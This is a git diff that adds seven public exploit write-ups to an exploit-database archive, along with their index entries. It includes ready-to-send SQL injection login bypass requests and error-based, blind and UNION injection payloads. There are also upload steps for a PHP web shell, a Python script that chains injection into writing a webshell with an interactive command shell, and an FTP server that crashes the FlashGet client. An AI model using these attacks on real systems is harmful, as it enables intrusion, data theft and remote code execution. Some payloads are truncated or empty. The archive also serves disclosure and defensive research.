diff --git a/exploits/hardware/webapps/48436.txt b/exploits/hardware/webapps/48436.txt
new file mode 100644
index 000000000..0260e847c
--- /dev/null
+++ b/exploits/hardware/webapps/48436.txt
@@ -0,0 +1,147 @@
+# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-05-07
+# Vendor: https://www.draytek.com/
+# Software: https://www.draytek.com/products/vigorap-903/
+# CVE: N/A
+
+Document Title:
+===============
+Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2244
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Product & Service Introduction:
+===============================
+https://www.draytek.com/
+https://www.draytek.com/products/vigorap-903/
+
+
+
+Affected Product(s):
+====================
+Draytek
+[+] VigorAP 1000C | 1.3.2
+[+] VigorAP 700 | 1.11
+[+] VigorAP 710 | 1.2.5
+[+] VigorAP 800 | 1.1.4
+[+] VigorAP 802 | 1.3.2
+[+] VigorAP 810 | 1.2.5
+[+] VigorAP 900 | 1.2.0
+[+] VigorAP 902 | 1.2.5
+[+] VigorAP 903 | 1.3.1
+[+] VigorAP 910C | 1.2.5
+[+] VigorAP 912C | 1.3.2
+[+] VigorAP 918R Series | 1.3.2
+[+] VigorAP 920R Series | 1.3.0
+[+] All other VigorAP Series with Radius Module
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-07: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the
+official Draytek VigorAP product series application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent input validation web vulnerability is located in the
+username input field of the RADIUS Setting - RADIUS Server
+Configuration module. Remote attackers with limited access are able to
+inject own malicious persistent script codes as username.
+Other privileged user accounts execute on preview of the modules
+context. The request method to inject is POST and the attack
+vector is located on the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Vulnerable Module(s):
+[+] RADIUS Setting - RADIUS Server Configuration - Users Profile
+
+Vulnerable Input(s):
+[+] Username
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steĆ¼s below to continue.
+
+
+PoC: Payload
+
+
+
+PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
+
+
+
+Reference(s):
+http:/vigorAP.localhost:50902/
+http:/vigorAP.localhost:50902/home.asp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48435.txt b/exploits/php/webapps/48435.txt
new file mode 100644
index 000000000..431b45a16
--- /dev/null
+++ b/exploits/php/webapps/48435.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
+# Date: 2020-05-07
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: phone and password
+#Injected Request
+#Below request will allow authentication bypass
+
+POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 52
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Car%20Park%20Management%20System/
+Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
+Upgrade-Insecure-Requests: 1
+
+phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
\ No newline at end of file
diff --git a/exploits/php/webapps/48437.txt b/exploits/php/webapps/48437.txt
new file mode 100644
index 000000000..56e9304bb
--- /dev/null
+++ b/exploits/php/webapps/48437.txt
@@ -0,0 +1,32 @@
+# Exploit Title: School File Management System 1.0 - 'username' SQL Injection
+# Date: 2020-05-04
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /sfms/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 173
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sfms/admin/index.php
+Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g
+Upgrade-Insecure-Requests: 1
+
+username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=
+
+
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48438.txt b/exploits/php/webapps/48438.txt
new file mode 100644
index 000000000..d1694393e
--- /dev/null
+++ b/exploits/php/webapps/48438.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: Products.php
+
+#Exploit
+ Open Products.php and select any product
+ Fill details
+ Create php shell code with below script
+ &1'); ?>
+ Click on upload Image
+ Select php file
+ Click Submet
+ Access below URL:
+ http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
+ add system commands after e to execute it.
\ No newline at end of file
diff --git a/exploits/php/webapps/48439.txt b/exploits/php/webapps/48439.txt
new file mode 100644
index 000000000..e5d2f212d
--- /dev/null
+++ b/exploits/php/webapps/48439.txt
@@ -0,0 +1,74 @@
+# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-05-05
+# Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE)
+
+# Vulnerable Source Code:
+# /e-learningsystem/admin/login.php
+# 121 $email = trim($_POST['user_email']);
+# 122 $upass = trim($_POST['user_pass']);
+# 123 $h_upass = sha1($upass);
+# 132 $user = new User();
+# 134 $res = $user::userAuthentication($email, $h_upass);
+# /e-learningsystem/include/accounts.php
+# 3 class User {
+# 23 static function userAuthentication($email,$h_pass){
+# 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'");
+# /e-learningsystem/admin/modules/lesson/edit.php
+# 6 @$id = $_GET['id'];
+# 7 if($id==''){
+# 10 $lesson = New Lesson();
+# 11 $res = $lesson->single_lesson($id);
+# /e-learningsystem/include/lessons.php
+# 4 class Lesson {
+# 5 protected static $tblname = "tbllesson";
+# 35 function single_lesson($id=0){
+# 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1");
+
+import requests, sys, re
+
+requests.packages.urllib3.\
+disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL):
+ try:
+ while True:
+ cmd = raw_input('C:\\ ')
+ command = {'cmd': cmd}
+ r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False)
+ response = r2.text
+ cleanResponse = response.replace('AAAAAAAAAAAAAAA', '')
+ cleanResponse = cleanResponse.replace('313371337', '')
+ print(cleanResponse)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print "(+) Usage: %s " % sys.argv[0]
+ print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0]
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ ADMIN_URL = SERVER_URL + 'admin/login.php'
+ LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php'
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''}
+ s.post(ADMIN_URL, data=payload1, verify=False)
+
+ payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'}
+ r1 = s.get(LESSON_URL, params=payload2, verify=False)
+ dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text))
+ dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath)
+ dataPath=re.sub('">.*$', '', dataPath)
+ dataPath=dataPath.replace('\\\\', '/')
+ xamppPath=re.sub('xampp.*', 'xampp', dataPath)
+ payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'}
+ print(payload3)
+ s.get(LESSON_URL, params=payload3, verify=False)
+ webshell(SERVER_URL)
\ No newline at end of file
diff --git a/exploits/php/webapps/48440.txt b/exploits/php/webapps/48440.txt
new file mode 100644
index 000000000..4e79b1d9d
--- /dev/null
+++ b/exploits/php/webapps/48440.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-07
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+The Online AgroCulture Farm Management System v1.0 application is vulnerable to
+SQL injection via the 'pid' parameter on the review.php page.
+# vulnerable file : review.php
+http://localhost/AgroCulture/review.php?pid=27
+
+Parameter: pid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+
+
+# Proof of Concept:
+http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli
+
+GET AgroCulture/review.php?pid=27 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
\ No newline at end of file
diff --git a/exploits/windows/dos/48434.py b/exploits/windows/dos/48434.py
new file mode 100755
index 000000000..89236db7f
--- /dev/null
+++ b/exploits/windows/dos/48434.py
@@ -0,0 +1,54 @@
+# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
+# Date: 2020-05-02
+# Author: Milad Karimi
+# Testen on: Kali Linux
+# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
+# Version: 1.9.6
+# CVE : N/A
+
+#!/usr/bin/python
+
+from time import sleep
+from socket import *
+
+res = [
+ '220 WELCOME!! :x\r\n',
+ '331 Password required for %s.\r\n',
+ '230 User %s logged in.\r\n',
+ '250 CWD command successful.\r\n',
+ '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
+ ]
+
+buf = 'A' * 332
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind(('0.0.0.0', 21))
+s.listen(1)
+print '[+] listening on [FTP] 21 ...\n'
+c, addr = s.accept()
+c.send(res[0])
+
+user = ''
+
+for i in range(1, len(res)):
+ req = c.recv(1024)
+ print '[*][CLIENT] %s' % (req)
+ tmp = res[i]
+ if(req.find('USER') != -1):
+ req = req.replace('\r\n', '')
+ user = req.split('\x20', 1)[1]
+ tmp %= user
+ if(req.find('PASS') != -1):
+ tmp %= user
+ if(req.find('PWD') != -1):
+ tmp %= buf
+ print '[*][SERVER] %s' % (tmp)
+ c.send(tmp)
+
+sleep(5)
+c.close()
+s.close()
+
+print '[+] DONE'
+
+# Discovered By : Milad Karimi
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 88b87f0df..ce1992889 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6730,6 +6730,7 @@ id,file,description,date,author,type,platform,port
48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
+48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42666,3 +42667,9 @@ id,file,description,date,author,type,platform,port
48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,
+48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php,
+48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,
+48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
+48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
+48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
+48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,